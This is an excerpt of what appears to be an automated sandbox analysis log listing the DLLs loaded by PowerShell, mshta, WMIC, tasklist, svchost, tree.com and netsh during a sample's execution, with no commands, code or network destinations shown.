Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: textshaping.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
